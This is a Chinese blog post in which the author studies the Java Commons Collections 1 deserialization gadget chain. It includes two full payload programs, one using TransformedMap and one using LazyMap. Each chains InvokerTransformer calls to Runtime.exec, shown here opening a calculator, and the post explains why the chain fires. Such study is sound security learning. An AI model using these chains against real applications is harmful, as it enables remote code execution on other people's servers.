java--commoncollections1 反序列化漏洞利用学习

已于 2022-05-11 14:25:01 修改
阅读量516 收藏 2
点赞数 5
分类专栏: 代码审计学习 文章标签: java 学习 开发语言
于 2022-05-09 17:32:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44769520/article/details/124665796
版权

先附上代码 :jdk7u80环境

import org.apache.commons.collections.map.TransformedMap;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import javax.annotation.Generated;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Map;

public class test {

    public static String fileName = "CC1withTransformedMap.bin";
    public static void main(String[] args) throws ClassNotFoundException, InvocationTargetException,
            InstantiationException, IllegalAccessException, IOException {

        Map hashMap = new HashMap();

        hashMap.put("comments", 2);

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"open -a Calculator.app"})
                      };
        Transformer transformerchain = new ChainedTransformer(transformers);
        Map  transformedMap = TransformedMap.decorate(hashMap, null, transformerchain);
        Class<?> c  = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");

        Constructor<?> constructor = c.getDeclaredConstructors()[0];
        constructor.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) constructor.newInstance(Generated.class, transformedMap);

        FileOutputStream file = new FileOutputStream(new File(fileName));
        ObjectOutputStream out = new ObjectOutputStream(file);
        out.writeObject(handler);

        FileInputStream file1 = new FileInputStream(new File(fileName));
        ObjectInputStream in = new ObjectInputStream(file1);
        in.readObject();
    }
}

要想触发反序列化漏洞,我们需要一个类且重写了readObject方法,并且在其方法中存在对于TransformedMap的put方法或者实现了setValue方法,或对于lazymap实现了get方法,那么下面就针对这两种map的利用方法进行分析。

主要是利用了sun.reflect.annotation.AnnotationInvocationHandler这个类,这个类实现了 InvocationHandler 接口,原本是用于 JDK 对于注解形式的动态代理。

动态代理的学习参考(代理模式的使用总结_张彦峰ZYF的博客-CSDN博客_代理模式有啥用

通过学习,可以大致的对动态代理有了一些浅显的理解

ExampleInvocationHandler对InvocationHandler中的invoke接口重写,就是当获取到get方法的时候会输出Method is get,并且返回结果为this is get method

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.util.Map;

public class ExampleInvocationHandler implements InvocationHandler {

    protected Map map;
    public ExampleInvocationHandler(Map map) {
        this.map = map;
    }
    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
        if(method.getName().equals("get")){
            System.out.println("Method is get.");
            return "this is get method!";
        }
        return method.invoke(this.map,args);
    }
}

那么我们在如何利用呢,可以参考如下代码

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

public class app {
    public static void main(String[] args) {
        Map hashMap = new HashMap();
        hashMap.put("hello","zyer");
        InvocationHandler handler = new ExampleInvocationHandler(hashMap);
        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(),new Class[]{Map.class},handler);
        String result = (String) proxyMap.get("hello");
        System.out.println(result);

    }
}

新建了一个hashMap,我们将为这个hashMap做代理,直白点说就是,我们想hook(钩)这个方法,然后对这个方法的返回值进行修改,那么需要用到java.reflect.Proxy这个类。

上面的代码结合动态代理学习的文章可以理解为:HashMap是学生,handler是班长,学生缴费通过班长,那么我们对班长进行操作即可,那么班长就是学生的代理,那么我们对班长设置一些要求,变相的就是对学生设置的要求。

那么我们利用到的动态代理的部分就是invoke方法,对于动态代理的知识看上面的文章即可,我们基本了解一下即可:一般的名字就叫...InvocationHandler,这其中会有一个invoke方法,其中包含三个参数(Object var1, Method var2, Object[] var3),且所有执行代理对象的方法都会被替换成执行invoke方法,那么就是需要我们将实现代码放到invoke函数中去来执行。

那么下面就是通过两种思路进行反序列化漏洞:

  1. TransformedMap利用反序列化重写readObject中调用setValue方法
  2. LazyMap在invoke中会调用get方法

1.TransformedMap利用

先看一下AnnotationInvocationHandler的构造方法。

构造方法接收两个参数,第一个参数是 Annotation 实现类的 Class 对象,第二个参数是是一个 key 为 String、value 为 Object 的 Map。构造方法判断 var1 有且只有一个父接口,并且是 Annotation.class,才会将两个参数初始化在成员属性 type 和 memberValues 中。

 因为这个类实现了基于动态代理实现的,那么它就一定有invoke方法,但是在TransformedMap的利用中没有利用到invoke函数,而是利用的readObject函数中的setValue方法,那么我们直接进入readObject方法。

根据上面的定义,我们可以知道这个meberValues就是构造方法中传入的一个Map对象,首先先将其遍历,然后进行if判断,其中判断的内容包括:

首先调用 AnnotationType.getInstance(this.type) 方法来获取 type 这个注解类对应的 AnnotationType 的对象,然后获取其 memberTypes 属性,这个属性是个 Map,存放这个注解中可以配置的值。

然后循环 this.memberValues 这个 Map ,获取其 Key,如果注解类的 memberTypes 属性中存在与 this.memberValues 的 key 相同的属性,并且取得的值不是 ExceptionProxy 的实例也不是 memberValues 中值的实例,则取得其值,并调用 setValue 方法写入值。

private final Map<String, Object> memberValues;
......
......
AnnotationInvocationHandler(Class<? extends Annotation> var1, Map<String, Object> var2) {
......
this.memberValues = var2;
......
}

那么我们根据文章开头的payload可以使用Generated.class,且原始的map中put("commonts",2)。

InvocationHandler handler = (InvocationHandler) constructor.newInstance(Generated.class, transformedMap);

那么我们查看一下Generated.class

发现其中有三个的定义,那么我们可以调试一下查看过程变量的值

 然后查看一下我们定义的transformedMap即这里的var4

最终整理一下这个的判断流程:

我们传入的是("commonts",2),其中传入的commonts是String类型的,2是Integer类型的,

while(var4.hasNext()) {
    Entry var5 = (Entry)var4.next();
    String var6 = (String)var5.getKey(); //commit-->String
    Class var7 = (Class)var3.get(var6);  //根据Generated中的String comments() default ""; 可以知道var7是String类型的
    if (var7 != null) {
    Object var8 = var5.getValue(); //v5=2 是int类型的
    if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
          var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
                }
            }
        }

最后因为var8是Integer类型而不是String类型且不为ExceptionProxy类型而进入if语句中。

所以,如果我们使用map.put("comments","zyer");就不会触发这个if判断了。那么其他利用方式针对

可以传入("value",非String[]类型),("data",非String类型) ,("comments",非String类型) 

2.LazyMap

payload代码

import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import java.io.*;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;
public class test {

    public static void main(String[] args) throws Exception {

        ChainedTransformer chain = new ChainedTransformer(new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"open -a Calculator.app"})
        });

        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap,chain);
        Class name = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor = name.getDeclaredConstructor(Class.class,Map.class);
        constructor.setAccessible(true);
        InvocationHandler invocationHandler = (InvocationHandler) constructor.newInstance(Retention.class,outerMap);
        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(),new Class[]{Map.class},invocationHandler);
        invocationHandler = (InvocationHandler) constructor.newInstance(Retention.class,proxyMap);

        FileOutputStream file = new FileOutputStream(new File("1.txt"));
        ObjectOutputStream out = new ObjectOutputStream(file);
        out.writeObject(invocationHandler);

        FileInputStream file1 = new FileInputStream(new File("1.txt"));
        ObjectInputStream in = new ObjectInputStream(file1);
        in.readObject();


    }
}

是通过方式使lazymap调用了get方法

那构造的思路的就有了,在使用带有装饰器的 LazyMap 初始化 AnnotationInvocationHandler 之前,先使用 InvocationHandler 代理一下 LazyMap,这样反序列化 AnnotationInvocationHandler 时,调用 LazyMap 值的 setValue 方法之前会调用代理类的 invoke 方法,触发 LazyMap 的 get 方法。

原理探究:

我们可以看一下LazyMap的get方法的定义

LazyMap的漏洞触发点和TransformedMap唯一的差别是,TransformedMap是在写入元素的时候执 行transform,而LazyMap是在其get方法中执行的 factory.transform 。其实这也好理解,LazyMap 的作用是“懒加载”,在get找不到值的时候,它会调用 factory.transform 方法去获取一个值,所以我们在使用LazyMap时才需要get一个不存在的值来触发我们的TransformedChain

 那么对上面的payload代码的理解就是:

首先构造一个TransformedChain,使用LazyMap对一个HashMap使用decorate方法。

使用反射的方法获取一个AnnotationInvocationHandler的实例对象,其构造方法进行赋值,并通过寻找一个符合if判断条件的class文件使得可以将我们构造的map对象赋值给memberValues

 因为在定义处我们可以知道AnnotationInvocationHandler重写了InvocationHandler接口

 那么我们就可以将其看成一个动态代理的对象方法,然后通过使用newProxyInstance方法来使得我们传入的Map会调用其invoke方法,因为我们没有调用map中的任何方法,于是会导致进入switch语句中的default判断,从而使得调用了map的get方法触发命令执行 

最后因为代理类不能被序列化,那么我们还需要AnnotationInvocationHandler 对这个Map进行包裹   ,然后进行序列化操作。

上面的内容参考su18师傅:Java 反序列化漏洞(二) - Commons Collections | 素十八 

zyer1
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
Java反序列化漏洞利用工具.zip
04-10
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以
【心得】java反序列化漏洞利用启蒙个人笔记
最新发布
uuzeray的博客
01-22 1299
不需要其他依赖,原生java库,支持反序列化后,触发一次dns请求HashMap存放键值对的集合为了验证键有没有重复,会对键 进行取哈希值操作hashCode 相同,就认为集合里面有这个键了,为了避免一个键对应多个值,所以会覆盖。
Java反序列化漏洞利用及修复 示例代码
白帽子凯哥哥的博客
01-03 585
Java反序列化漏洞发生在当应用程序或服务反序列化了恶意构造的或篡改的数据时。Java序列化是一个将对象转换为字节流的过程,以便可以将其写入磁盘、数据库或通过网络传输。反序列化则是将这些字节流重新构造成原始对象的过程。
Java反序列化漏洞利用工具(全)
09-14
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以……
Java反序列化漏洞分析
abg49988的博客
10-15 1365
相关学习资料   http://www.freebuf.com/vuls/90840.html   https://security.tencent.com/index.php/blog/msg/97   http://www.tuicool.com/articles/ZvMbIne   http://www.freebuf.com/vuls/86566.html  ...
java 反序列化漏洞 利用思路简介
whatday的专栏
08-01 1382
目录 序列化的过程 readObject方法 反射链 完成反序列漏洞实践 结论 之前听别人讲解反序列化的漏洞听的晕乎乎的,刚脆就趁着周末研究一下反序列化漏洞,并且搭建实战环境实际操作了一把,明白了之后发现之前听的迷糊更多是因为对于反序列漏洞思路不够清晰,明白了反序列的流程之后,反序列化漏洞很好理解。 下面的内容,我将详细论诉反序列化漏洞的利用思路。 序列化的过程 这里梳理一下正常的序列化的流程,将一个类进行序列化存储成二进制文件,然后再将该文件进行反序列化生成对象。 首先新建一个新的us
Java反序列化漏洞学习Commons Collection
l11III1111的博客
12-04 939
转载自跳跳糖社区:https://tttang.com/archive/1337/ 笔者是一个刚入门Java安全的萌新,一个月前跟着P神的Java安全漫谈开始学习Java反序列化漏洞。笔者学习的方法是看完文章然后拷贝代码下来idea跟着调一遍,每次调完后会感觉自己已经完全掌握了这条利用链,但是在之后一段时间重新看这条链时会发现完全搞不懂,就这样折腾了几天。写这篇文章的目的是帮助更多和我一样的萌新开始真正的利用链分析,而不是拷贝代码下来跟着调就行了,我会以构造利用链的角度,每一步会有一个小demo演示如何构
Java反序列化漏洞利用工具V1.7.jar
03-25
Java反序列化漏洞利用工具
Java反序列化漏洞利用工具(WebLogic&Jboss;)
10-10
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
java反序列化漏洞工具
03-07
该工具用于验证weblogic反序列化漏洞是否存在,工具语言java
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
Java-Deserialization-Cheat-Sheet:关于Java反序列化漏洞的备忘单
05-02
面向渗透测试人员和研究人员的备忘单,其中涉及各种Java(JVM)序列化库中的反序列化漏洞。 请使用#javadeser哈希标签进行鸣叫。 表中的内容 json-io(JSON) 杰克逊(JSON) Fastjson(JSON) Genson(JSON) ...
反序列化漏洞的利用
Zeker62的博客
08-23 1076
目录PHP序列化格式JAVA序列化格式操作序列化对象修改对象属性修改数据类型使用应用程序功能魔术方法注入任意对象小工具链使用预先构建的小工具链ysoserialPHP 通用小工具链使用记录的小工具链创建自己的漏洞利用PHP序列化格式 假设一个对象User具有以下属性: $user->name = "carlos"; $user->isLoggedIn = true; 序列化之后,对象...
【CVE】CVE-2015-5254:ActiveMQ 反序列化漏洞利用
边扯边淡
03-15 1823
起序:复现不难,就是需要好好的准备好靶场环境。 一、靶场环境 使用的是 github 上的 vulhub 环境。ActiveMQ 版本为 5.11.1。 vulhub:https://github.com/vulhub/vulhub 1、漏洞:反序列化漏洞 该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 2、影响版本 ActiveMQ < 5.13.0 之前 5.x 版本。 .
Java 反序列化漏洞
qq_61553520的博客
05-24 3771
在各种编程语言反序列化漏洞中,Java是最引人瞩目的,因为Java开发生态中各种第三方库组件相互依赖,经常出现开发中常用的基础底层组件出现安全问题时,会引发核弹式反应,进而影响到上层得操作系统。
Java反序列化漏洞利用学习与实践
weixin_33852020的博客
09-15 373
本文讲的是Java反序列化漏洞利用学习与实践, 利用DeserLab 建议你在阅读本文之前,先阅读《攻击Java反序列化过程》,这样你就会对java反序列化有一个比较清晰的认识。除此之外,这篇文章还提到了一个“DeserLab”的演示应用。为了有效利用反序列化漏洞,理解序列化的原理以及反序列化漏洞利用的工作原理(如面向属性的编程原理),研究人员就要找...
6-java安全——java反序列化漏洞利用
网络安全
07-01 3905
本篇将学习java反序列化漏洞原理,然后结合一个apache commons-collections组件反序列化漏洞来学习如何构造利用链。 我们知道序列化操作主要是由ObjectOutputStream类的 writeObject()方法来完成,反序列化操作主要是由ObjectInputStream类的readObject()方法来完成。当可序列化对象重写了readObject方法后,在反序列化时一般会调用序列化对象的readObject方法。 在Student类中重写ObjectInputSt
Java反序列化漏洞一般利用思路
09-22
1. 找到目标:攻击者首先需要找到运行了可利用Java反序列化漏洞的目标程序。这可以通过分析目标程序的代码、网络流量或者漏洞公开报告等途径进行。 2. 构造恶意序列化数据:攻击者需要构造恶意的序列化数据,这些...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值